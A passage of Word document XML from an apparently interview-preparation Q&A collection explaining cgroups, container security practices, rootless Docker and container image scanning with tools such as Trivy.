        <w:t xml:space="preserve">    memory: "1Gi"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cpu: "1"</w:t>
        <w:br/>
        <w:t>Kubernetes configures cgroups on the node to enforce these limits.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Namespaces vs cgroups</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Namespaces</w:t>
        <w:br/>
        <w:tab/>
        <w:t>cgroups</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Isolation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Resource Control</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Question Answered</w:t>
        <w:br/>
        <w:tab/>
        <w:t>“What can I see?”</w:t>
        <w:br/>
        <w:tab/>
        <w:t>“How much can I use?”</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Example</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Separate network stack</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limit RAM to 1 GB</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Containers rely on both:</w:t>
        <w:br/>
        <w:t>Namespaces → Isolation</w:t>
        <w:br/>
        <w:t>cgroups    → Resource Limits</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>cgroups v1 vs v2</w:t>
        <w:br/>
        <w:t>cgroups v1</w:t>
        <w:br/>
        <w:tab/>
        <w:t>cgroups v2</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Multiple hierarchies</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Unified hierarchy</w:t>
        <w:br/>
        <w:tab/>
        <w:t>More complex</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Simpler</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Older systems</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Modern Linux distributions</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Less consistent</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Better resource management</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Most modern Kubernetes distributions use cgroups v2.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>cgroups, or Control Groups, are a Linux kernel feature that manages and limits resource consumption for groups of processes. They enable containers to have controlled access to CPU, memory, disk I/O, network bandwidth, and process counts. While namespaces provide isolation, cgroups enforce resource governance and prevent noisy-neighbor issues. Docker and Kubernetes rely heavily on cgroups to implement resource requests, limits, and quality-of-service policies. Together, namespaces and cgroups form the foundation of container runtime isolation and resource management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q364. Explain container security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Container Security?</w:t>
        <w:br/>
        <w:t>Container security is the practice of protecting containerized applications, container images, runtimes, registries, hosts, and orchestration platforms throughout the application lifecycle.</w:t>
        <w:br/>
        <w:t>The goal is to ensure:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Confidentiality</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Integrity</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Availability</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Compliance</w:t>
        <w:br/>
        <w:t>of containerized workloads.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Container Security Layers</w:t>
        <w:br/>
        <w:t>+----------------------+</w:t>
        <w:br/>
        <w:t>| Application Security |</w:t>
        <w:br/>
        <w:t>+----------------------+</w:t>
        <w:br/>
        <w:t>| Container Image      |</w:t>
        <w:br/>
        <w:t>+----------------------+</w:t>
        <w:br/>
        <w:t>| Container Runtime    |</w:t>
        <w:br/>
        <w:t>+----------------------+</w:t>
        <w:br/>
        <w:t>| Container Host       |</w:t>
        <w:br/>
        <w:t>+----------------------+</w:t>
        <w:br/>
        <w:t>| Registry Security    |</w:t>
        <w:br/>
        <w:t>+----------------------+</w:t>
        <w:br/>
        <w:t>| Kubernetes Security  |</w:t>
        <w:br/>
        <w:t>+----------------------+</w:t>
        <w:br/>
        <w:t>| Infrastructure       |</w:t>
        <w:br/>
        <w:t>+----------------------+</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>1. Secure Container Images</w:t>
        <w:br/>
        <w:t>Use Trusted Base Images</w:t>
        <w:br/>
        <w:t>Good:</w:t>
        <w:br/>
        <w:t>FROM ubuntu:24.04</w:t>
        <w:br/>
        <w:t>Better:</w:t>
        <w:br/>
        <w:t>FROM alpine:3.22</w:t>
        <w:br/>
        <w:t>Use official and verified images from trusted registries.</w:t>
        <w:br/>
        <w:t>Scan Images for Vulnerabilities</w:t>
        <w:br/>
        <w:t>Tools:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Trivy</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Grype</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Clair</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>trivy image myapp:v1</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Run Containers as Non-Root</w:t>
        <w:br/>
        <w:t>Avoid:</w:t>
        <w:br/>
        <w:t>USER root</w:t>
        <w:br/>
        <w:t>Use:</w:t>
        <w:br/>
        <w:t>RUN adduser appuser</w:t>
        <w:br/>
        <w:t>USER appuser</w:t>
        <w:br/>
        <w:t>This reduces privilege escalation risks.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Minimize Image Size</w:t>
        <w:br/>
        <w:t>Use:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Alpine images</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Distroless images</w:t>
        <w:br/>
        <w:t>Smaller images:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reduce attack surface</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Improve startup times</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Protect Secrets</w:t>
        <w:br/>
        <w:t>Never store secrets inside images.</w:t>
        <w:br/>
        <w:t>Bad:</w:t>
        <w:br/>
        <w:t>ENV DB_PASSWORD=password123</w:t>
        <w:br/>
        <w:t>Use:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kubernetes Secrets</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * External secret managers</w:t>
        <w:br/>
        <w:t>Examples:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * HashiCorp Vault</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Amazon Web Services Secrets Manager</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Microsoft Key Vault</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. Runtime Security</w:t>
        <w:br/>
        <w:t>Limit container privileges:</w:t>
        <w:br/>
        <w:t>docker run \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --read-only \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --cap-drop ALL \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  myapp</w:t>
        <w:br/>
        <w:t>Use:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Read-only filesystem</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Drop unnecessary Linux capabilities</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Restrict privileged containers</w:t>
        <w:br/>
        <w:t>Avoid:</w:t>
        <w:br/>
        <w:t>docker run --privileged</w:t>
        <w:br/>
        <w:t>unless absolutely necessary.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>6. Kernel Security Features</w:t>
        <w:br/>
        <w:t>Seccomp</w:t>
        <w:br/>
        <w:t>Restricts Linux system calls.</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>Seccomp Filter</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>Kernel</w:t>
        <w:br/>
        <w:t>AppArmor / SELinux</w:t>
        <w:br/>
        <w:t>Provide mandatory access control policies.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * AppArmor</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * SELinux</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>7. Registry Security</w:t>
        <w:br/>
        <w:t>Protect container registries using:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Authentication</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * RBAC</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Vulnerability scanning</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Image signing</w:t>
        <w:br/>
        <w:t>Examples:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Amazon ECR</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Azure Container Registry (ACR)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Harbor</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>8. Image Signing</w:t>
        <w:br/>
        <w:t>Verify image authenticity.</w:t>
        <w:br/>
        <w:t>Tools:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cosign</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Sigstore</w:t>
        <w:br/>
        <w:t>This helps prevent supply-chain attacks.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>9. Kubernetes Security</w:t>
        <w:br/>
        <w:t>Key controls:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * RBAC</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Network Policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pod Security Standards</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Admission Controllers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Secret Management</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>securityContext:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  runAsNonRoot: true</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>10. Runtime Threat Detection</w:t>
        <w:br/>
        <w:t>Monitor containers for suspicious activity.</w:t>
        <w:br/>
        <w:t>Tools:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Falco</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Sysdig Secure</w:t>
        <w:br/>
        <w:t>Examples:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Shell spawned inside container</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Unexpected network connections</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Privilege escalation attempts</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Container Security Best Practices</w:t>
        <w:br/>
        <w:t>✅ Use minimal base images</w:t>
        <w:br/>
        <w:t>✅ Scan images in CI/CD pipelines</w:t>
        <w:br/>
        <w:t>✅ Run as non-root user</w:t>
        <w:br/>
        <w:t>✅ Avoid privileged containers</w:t>
        <w:br/>
        <w:t>✅ Store secrets securely</w:t>
        <w:br/>
        <w:t>✅ Enable image signing</w:t>
        <w:br/>
        <w:t>✅ Use RBAC and network policies</w:t>
        <w:br/>
        <w:t>✅ Keep images patched and updated</w:t>
        <w:br/>
        <w:t>✅ Monitor runtime behavior</w:t>
        <w:br/>
        <w:t>✅ Enforce admission policies</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Container security is a layered approach to securing containerized applications across the image, registry, runtime, host, and orchestration layers. Key practices include using trusted and minimal base images, scanning images for vulnerabilities, running containers as non-root users, enforcing least privilege through Linux capabilities and seccomp profiles, securing registries with authentication and image signing, and implementing Kubernetes controls such as RBAC and network policies. Runtime security tools like Falco help detect anomalous behavior. Effective container security requires integrating security controls throughout the software supply chain and deployment lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q365. What is rootless Docker?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Rootless Docker?</w:t>
        <w:br/>
        <w:t>Rootless Docker is a mode in which the Docker daemon and containers run without root privileges on the host system.</w:t>
        <w:br/>
        <w:t>In traditional Docker, the Docker daemon (dockerd) runs as root, which means a compromise of Docker could potentially lead to full host access.</w:t>
        <w:br/>
        <w:t>Rootless Docker reduces this risk by running Docker entirely as an unprivileged user.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Traditional Docker vs Rootless Docker</w:t>
        <w:br/>
        <w:t>Traditional Docker</w:t>
        <w:br/>
        <w:t>User</w:t>
        <w:br/>
        <w:t xml:space="preserve">  │</w:t>
        <w:br/>
        <w:t>Docker CLI</w:t>
        <w:br/>
        <w:t xml:space="preserve">  │</w:t>
        <w:br/>
        <w:t>dockerd (root)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  │</w:t>
        <w:br/>
        <w:t>Containers</w:t>
        <w:br/>
        <w:t>Rootless Docker</w:t>
        <w:br/>
        <w:t>User</w:t>
        <w:br/>
        <w:t xml:space="preserve">  │</w:t>
        <w:br/>
        <w:t>Docker CLI</w:t>
        <w:br/>
        <w:t xml:space="preserve">  │</w:t>
        <w:br/>
        <w:t>dockerd (non-root)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  │</w:t>
        <w:br/>
        <w:t>Containers</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How It Works</w:t>
        <w:br/>
        <w:t>Rootless Docker relies on:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * User Namespaces</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * RootlessKit</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * slirp4netns (networking)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * fuse-overlayfs (storage)</w:t>
        <w:br/>
        <w:t>A container may appear to run as root inside the container, but it is mapped to an unprivileged user on the host.</w:t>
        <w:br/>
        <w:t>Container UID 0 (root)</w:t>
        <w:br/>
        <w:t xml:space="preserve">          │</w:t>
        <w:br/>
        <w:t xml:space="preserve">          ▼</w:t>
        <w:br/>
        <w:t>Host UID 1000 (non-root user)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t>1. Improved Security</w:t>
        <w:br/>
        <w:t>Even if a container is compromised:</w:t>
        <w:br/>
        <w:t>Container Escape</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Non-Root User</w:t>
        <w:br/>
        <w:t>The attacker does not automatically gain root access on the host.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Reduced Attack Surface</w:t>
        <w:br/>
        <w:t>No root-owned Docker daemon is exposed.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Better Multi-User Environments</w:t>
        <w:br/>
        <w:t>Useful on:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Shared servers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Development workstations</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * CI/CD runners</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Installation</w:t>
        <w:br/>
        <w:t>On modern Linux distributions:</w:t>
        <w:br/>
        <w:t>dockerd-rootless-setuptool.sh install</w:t>
        <w:br/>
        <w:t>Start service:</w:t>
        <w:br/>
        <w:t>systemctl --user start docker</w:t>
        <w:br/>
        <w:t>Check:</w:t>
        <w:br/>
        <w:t>docker info</w:t>
        <w:br/>
        <w:t>Output includes:</w:t>
        <w:br/>
        <w:t>rootless: true</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t>Rootless Docker has some restrictions:</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Rootless Support</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Privileged Containers</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Host Network Mode</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Some Low-Level Kernel Features</w:t>
        <w:br/>
        <w:tab/>
        <w:t>❌</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Standard Containers</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Volumes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Build Images</w:t>
        <w:br/>
        <w:tab/>
        <w:t>✅</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>When to Use Rootless Docker</w:t>
        <w:br/>
        <w:t>✅ Developer laptops</w:t>
        <w:br/>
        <w:t>✅ Shared Linux servers</w:t>
        <w:br/>
        <w:t>✅ CI/CD environments</w:t>
        <w:br/>
        <w:t>✅ Security-conscious deployments</w:t>
        <w:br/>
        <w:t>Less suitable when workloads require:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Privileged containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Direct host networking</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Certain kernel-level operations</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Rootless Docker vs Running a Container as Non-Root</w:t>
        <w:br/>
        <w:t>These are different concepts:</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Rootless Docker</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Non-Root Container</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Docker Daemon</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Non-root</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Root</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Container Process</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Non-root mapping</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Non-root user inside container</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Security Scope</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Entire Docker stack</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Application only</w:t>
        <w:br/>
        <w:tab/>
        <w:t>For maximum security, use both:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Rootless Docker</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Non-root application users inside containers</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Rootless Docker is a deployment mode where both the Docker daemon and containers run without root privileges on the host. It leverages Linux user namespaces to map container root users to unprivileged host users, significantly reducing the impact of container escapes and daemon compromises. Rootless Docker improves security and is particularly useful in multi-tenant environments, developer workstations, and CI/CD systems. While it supports most standard container workloads, it has limitations around privileged containers, host networking, and certain kernel-level operations. For defense in depth, Rootless Docker is typically combined with non-root container users and least-privilege security practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q366. Explain image scanning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Image Scanning?</w:t>
        <w:br/>
        <w:t>Image scanning is the process of analyzing a container image to identify:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Security vulnerabilities (CVEs)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Outdated packages</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Misconfigurations</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Exposed secrets</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * License compliance issues</w:t>
        <w:br/>
        <w:t>It helps ensure that only secure images are deployed to environments such as Docker and Kubernetes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Image Scanning is Important</w:t>
        <w:br/>
        <w:t>A container image may contain:</w:t>
        <w:br/>
        <w:t>Application</w:t>
        <w:br/>
        <w:t>├── OS Packages</w:t>
        <w:br/>
        <w:t>├── Libraries</w:t>
        <w:br/>
        <w:t>├── Dependencies</w:t>
        <w:br/>
        <w:t>└── Runtime</w:t>
        <w:br/>
        <w:t>Even if your application code is secure, vulnerabilities can exist in:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Base images</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Open-source libraries</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Operating system packages</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>FROM ubuntu:20.04</w:t>
        <w:br/>
        <w:t>The image may contain known vulnerabilities that need patching.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How Image Scanning Works</w:t>
        <w:br/>
        <w:t>Container Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Image Scanner</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Vulnerability Database (CVEs)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Security Report</w:t>
        <w:br/>
        <w:t>The scanner compares installed packages and libraries against vulnerability databases.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common Vulnerability Severity Levels</w:t>
        <w:br/>
        <w:t>Severity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Description</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Critical</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Immediate risk, exploit available</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Serious vulnerability</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Medium</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Moderate impact</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Minor issue</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Unknown</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Not yet classified</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Popular Image Scanning Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Trivy</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Grype</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Clair</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Snyk</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Prisma Cloud</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example Using Trivy</w:t>
        <w:br/>
        <w:t>Scan an image:</w:t>
        <w:br/>
        <w:t>trivy image nginx:latest</w:t>
        <w:br/>
        <w:t>Sample output:</w:t>
        <w:br/>
        <w:t>Total: 12 vulnerabilities</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CRITICAL: 1</w:t>
        <w:br/>
        <w:t>HIGH: 4</w:t>
        <w:br/>
        <w:t>MEDIUM: 5</w:t>
        <w:br/>
        <w:t>LOW: 2</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What Does Image Scanning Detect?</w:t>
        <w:br/>
        <w:t>OS Package Vulnerabilities</w:t>
        <w:br/>
        <w:t>openssl</w:t>
        <w:br/>
        <w:t>glibc</w:t>
        <w:br/>
        <w:t>curl</w:t>
        <w:br/>
        <w:t>bash</w:t>
        <w:br/>
        <w:t>Language Dependencies</w:t>
        <w:br/>
        <w:t>Python packages</w:t>
        <w:br/>
        <w:t>Node.js modules</w:t>
        <w:br/>
        <w:t>Java libraries</w:t>
        <w:br/>
        <w:t>Go modules</w:t>
        <w:br/>
        <w:t>Secrets</w:t>
        <w:br/>
        <w:t>Examples:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * AWS keys</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * API tokens</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Passwords</w:t>
        <w:br/>
        <w:t>Misconfigurations</w:t>
        <w:br/>
        <w:t>Examples:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Running as root</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Weak permissions</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Insecure settings</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CI/CD Integration</w:t>
        <w:br/>
        <w:t>Typical pipeline:</w:t>
        <w:br/>
        <w:t>Code Commit</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>Build Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>Image Scan</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>Pass?</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ┌───┴───┐</w:t>
        <w:br/>
        <w:t>Yes      No</w:t>
        <w:br/>
        <w:t xml:space="preserve"> │        │</w:t>
        <w:br/>
        <w:t>Deploy   Block Build</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>docker build -t myapp:v1 .</w:t>
        <w:br/>
        <w:t>trivy image myapp:v1</w:t>
        <w:br/>
        <w:t>Fail pipeline if:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Critical vulnerabilities exist</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Security policy is violated</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best Practices</w:t>
        <w:br/>
        <w:t>✅ Scan images during CI/CD</w:t>
        <w:br/>
        <w:t>✅ Use minimal base images (Alpine, Distroless)</w:t>
        <w:br/>
        <w:t>✅ Keep base images updated</w:t>
        <w:br/>
        <w:t>✅ Regularly rescan stored images</w:t>
        <w:br/>
        <w:t>✅ Block deployment of critical vulnerabilities</w:t>
        <w:br/>
        <w:t>✅ Remove unused packages</w:t>
        <w:br/>
        <w:t>✅ Scan both OS and application dependencies</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Image scanning is the process of analyzing container images for known security vulnerabilities, misconfigurations, exposed secrets, and compliance issues before deployment. The scanner compares operating system packages and application dependencies against vulnerability databases such as CVEs and generates a risk report. Tools like Trivy, Grype, Snyk, and Prisma Cloud are commonly integrated into CI/CD pipelines to enforce security gates. Image scanning is a critical DevSecOps practice that helps reduce the attack surface and prevents vulnerable container images from reaching production environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q367. What is Trivy?</w:t>
      </w:r>
    </w:p>
